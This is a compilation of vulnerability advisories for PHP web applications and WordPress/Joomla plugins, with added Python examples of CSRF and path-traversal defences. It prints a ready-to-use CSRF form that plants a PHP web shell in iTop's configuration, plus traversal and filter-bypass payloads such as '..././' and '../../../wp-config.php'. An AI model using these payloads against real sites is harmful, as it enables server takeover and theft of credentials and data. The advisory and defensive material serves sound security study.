Memphis Document Library 3.1.5 is vulnerable to arbitrary file download. The vulnerable file is mdocs-downloads.php and the vulnerable function is mdocs_img_preview(); the vulnerable GET parameter is 'mdocs-img-preview', and the affected code is at lines 90 to 93. The PoC is to request the target file with curl through that parameter. If the plugin is not installed in the WordPress root folder, the PoC downloads the file from the 'mdocs-posts' folder instead.
The vulnerability exists due to insufficient sanitization of user-supplied input passed in the 'gateway' parameter of the '/dharma-booking/frontend/ajax/gateways/proccess.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary PHP code on the target system.
The vulnerability occurs in the first lines of callback.php, where user input taken from the $_REQUEST variable is used without sanitization. Depending on the context, an attacker can host a file called wp-load.php on a server under their control (disabling PHP execution there with an .htaccess so that the raw source is served), or abuse the null byte character (%00, or %2500 when double URL-encoded) to truncate whatever the script appends to the supplied value.
Joomla Easy Youtube Gallery 1.0.2 is vulnerable to SQL injection. An attacker can inject SQL code through the 'mycategory' parameter of the 'com_easy_youtube_gallery' component. This can be exploited to read from the underlying database and potentially obtain sensitive information.
The vulnerability exists due to insufficient validation of user-supplied input in the 'file_path' and 'file_size' parameters of the '/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php' script. A remote attacker can download arbitrary files from the vulnerable system, which can lead to sensitive information disclosure.
ProjectSend is a self-hosted, PHP-based file-transfer platform. Several serious vulnerabilities have been discovered in it so far; the following are further persistent and non-persistent XSS vulnerabilities. The non-persistent XSS can be exploited by submitting a malicious payload in the search box on my_files/index.php and, as admin, in the search boxes on 'Manage Clients', 'Clients groups' and 'System Users'.
High-Tech Bridge Security Research Lab discovered a Remote Code Execution vulnerability in iTop that is exploitable via a Cross-Site Request Forgery flaw also present in the application. The vulnerability exists due to the absence of HTTP request origin validation in the "/env-production/itop-config/config.php" script, combined with a lack of sanitization of user input received via the "new_config" HTTP POST parameter. A remote unauthenticated attacker can perform a CSRF attack and execute arbitrary PHP code on the vulnerable system with the privileges of the web server. Successful exploitation may allow an attacker to execute arbitrary system commands on the web server and gain complete access to the web application and its databases, which may contain very sensitive information. The attacker creates a malicious web page with CSRF exploit code, tricks a logged-in administrator into visiting it, and thereby issues an HTTP request that appears to come from the legitimate user and permanently injects PHP code into the iTop configuration file. The CSRF exploit injects the following PHP code into the configuration file: <? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?> Note that this snippet uses the short open tag <?, which only executes where PHP's short_open_tag setting is enabled. To reproduce the vulnerability, create an empty HTML file and paste the following CSRF exploit code into it: <html><body><form action="http://[host]/env-production/itop-config/config.php" method="POST"><input type="hidden" name="new_config" value="<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>" /><input type="submit" value="Submit request" /></form></body></html>
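The iTop advisory names two missing checks: the script does not validate where the request came from, and it accepts a state-changing POST with nothing that ties the request to the logged-in session. The following added example (not iTop code, and not part of the advisory) shows both checks in Python: an Origin/Referer allow-list and a per-session anti-CSRF token compared in constant time. The hostname itop.example.org, the header and form field names, and the request dictionaries are constructed for the illustration; the attacker request mirrors the form in the PoC above, which carries only a new_config field and arrives with the attacker's own Origin.

```python
import hmac
import secrets
from typing import Mapping, Optional
from urllib.parse import urlsplit

# Assumption for the example: the application's own hostname(s).
ALLOWED_HOSTS = {"itop.example.org"}


def origin_ok(headers: Mapping[str, str]) -> bool:
    """Accept a state-changing request only if Origin (or, failing that,
    Referer) names one of our own hosts.

    A form auto-submitted from the attacker's page carries the attacker's
    Origin, so it fails here. An absent header, or the literal value "null",
    yields hostname None and is rejected: fail closed.
    """
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    return urlsplit(src).hostname in ALLOWED_HOSTS


def issue_csrf_token() -> str:
    """Fresh per-session secret, stored server-side and echoed into each form."""
    return secrets.token_urlsafe(32)


def csrf_token_ok(session_token: Optional[str], submitted: Optional[str]) -> bool:
    """Constant-time comparison so the token cannot be guessed byte by byte."""
    if not session_token or not submitted:
        return False
    return hmac.compare_digest(session_token, submitted)


def accept_config_change(headers: Mapping[str, str],
                         form: Mapping[str, str],
                         session: Mapping[str, str]) -> bool:
    """Gate for a config-writing POST: both checks must pass before
    'new_config' is even looked at."""
    return origin_ok(headers) and csrf_token_ok(session.get("csrf"),
                                                form.get("csrf_token"))


def demo() -> dict:
    """Constructed requests: the PoC-style cross-site post versus a genuine one."""
    token = issue_csrf_token()
    session = {"csrf": token}
    payload = "<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>"
    # What the advisory's HTML form produces when the admin's browser submits it.
    attacker_headers = {"Origin": "http://attacker.example"}
    attacker_form = {"new_config": payload}
    # A post from the application's own page, carrying the session token.
    legit_headers = {"Origin": "https://itop.example.org"}
    legit_form = {"new_config": "...", "csrf_token": token}
    return {
        "attacker_rejected": not accept_config_change(attacker_headers, attacker_form, session),
        "legit_accepted": accept_config_change(legit_headers, legit_form, session),
        # Right origin but a replayed/guessed token must still fail.
        "bad_token_rejected": not accept_config_change(
            legit_headers, {"new_config": "...", "csrf_token": token[:-1] + "x"}, session),
    }


if __name__ == "__main__":
    print(demo())
```

Origin checking alone is a defence in depth, not a substitute for the token: some clients strip Referer, and an Origin allow-list is only as good as the hostname comparison, which is why the example parses the header with urlsplit rather than doing a substring match.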
A remote unauthenticated attacker can create a specially crafted web page containing a CSRF exploit, trick a logged-in administrator into visiting it, and thereby issue an HTTP request that appears to come from the legitimate user, changing the login, email address and password of the current website administrator.
The download.php file in the WordPress image-export plugin is vulnerable to Local File Disclosure. An attacker can use the 'file' GET parameter to read any file the web server can access, including wp-config.php. This is exploited by sending a request to download.php with the 'file' parameter set to the path of the target file, such as '../../../wp-config.php'.
Xoops 2.5.7.2 has checks to defend against directory traversal, but they can be bypassed by issuing '..././' instead of '../': the check strips each '../' it finds only once, and removing the inner '../' from '..././' leaves a fresh '../' behind. Supplying '..././..././..././..././' in the GET parameter therefore traverses four directories up after the filter has run.
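The traversal entries above share one lesson: the image-export and audio-gallery downloads fail because a user-supplied path reaches the filesystem unchecked, and the Xoops check fails because it tries to sanitize the string instead of checking where the resulting path actually points. The following added example (not code from Xoops or from any of the WordPress plugins above) shows in Python the single-pass filter that '..././' defeats, the '../../etc/passwd' style payload, and the check a practitioner would want instead: URL-decode exactly once, reject embedded null bytes, canonicalise with realpath, and confirm the result is still inside the base directory. The base directory, the payloads and the 'docs/report.pdf' filename are constructed for the illustration.

```python
import os
import tempfile
import urllib.parse
from typing import Optional


def naive_strip_traversal(path: str) -> str:
    """Weak filter of the kind the Xoops bypass relies on: remove '../' once.

    str.replace() makes a single left-to-right pass, so in '..././' the
    match at offset 1 is removed and the remaining characters '.' + './'
    reassemble into '../'.
    """
    return path.replace("../", "")


def secure_resolve(base_dir: str, user_path: str) -> Optional[str]:
    """Return the canonical absolute path if it stays inside base_dir, else None.

    Canonicalise, then compare; do not try to clean the string. realpath()
    normalises '.' and '..' and resolves symlinks, and it works for paths
    that do not exist yet. Decode the value exactly once here and never
    again downstream, otherwise '%2500' turns into a NUL on the second pass.
    """
    decoded = urllib.parse.unquote(user_path)
    if "\x00" in decoded:                      # null-byte truncation attempt
        return None
    base = os.path.realpath(base_dir)
    # os.path.join discards base when decoded is absolute; the commonpath
    # check below catches that case as well.
    candidate = os.path.realpath(os.path.join(base, decoded))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:                          # e.g. different drives on Windows
        return None
    return candidate if inside else None


def demo() -> dict:
    """Run the payloads from the advisories above against a temporary base dir."""
    base = tempfile.mkdtemp()
    plain = "../../etc/passwd"              # image-export style payload
    xoops = "..././..././etc/passwd"        # Xoops filter-bypass payload
    real_base = os.path.realpath(base)
    return {
        "filtered_plain": naive_strip_traversal(plain),      # 'etc/passwd'
        "filtered_xoops": naive_strip_traversal(xoops),      # '../../etc/passwd'
        "plain_rejected": secure_resolve(base, plain) is None,
        # Unfiltered, '..././' is just a sub-directory literally named '...'
        # followed by '.', so a canonicalising check correctly keeps it inside.
        "xoops_raw_inside": secure_resolve(base, xoops) is not None,
        # Run the weak filter first and the same input becomes '../../'.
        "xoops_after_filter_rejected":
            secure_resolve(base, naive_strip_traversal(xoops)) is None,
        "legit_path_ok":
            secure_resolve(base, "docs/report.pdf")
            == os.path.join(real_base, "docs", "report.pdf"),
    }


if __name__ == "__main__":
    print(demo())
```

The order of operations is the point: a strip-and-trust filter can be undone by any input whose stripped form regenerates the pattern, whereas resolving the final path and comparing prefixes does not care what the string looked like before normalisation.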